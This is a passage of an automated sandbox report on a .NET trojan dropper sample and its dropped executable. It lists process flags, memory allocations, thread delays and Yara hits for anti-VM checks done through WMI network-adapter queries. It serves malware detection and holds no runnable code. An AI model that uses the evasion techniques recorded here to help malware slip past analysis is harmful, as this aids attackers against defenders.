                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 5616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tXBTtgndxsp.exe PID: 7356, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 4760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 83B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 81E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 81E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 1010000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 2C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory allocated: 4C40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199766Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199657Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199532Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199407Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199282Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199157Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199032Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198922Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198813Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198688Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198565Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198438Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198313Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198203Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198094Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197969Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197860Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199968
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199859
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199749
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199640
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199531
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199421
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199312
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199203
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199093
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198984
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198874
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198765
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198656
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198545
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198437
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198327
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198218
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198099
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197966
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197859
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197750
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8205Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 947Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWindow / User API: threadDelayed 4684Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWindow / User API: threadDelayed 5089Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWindow / User API: threadDelayed 7364
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWindow / User API: threadDelayed 2488
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 6368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99864s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99505s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99157s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -99043s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98930s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98493s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98151s >= -30000sJump to behavior
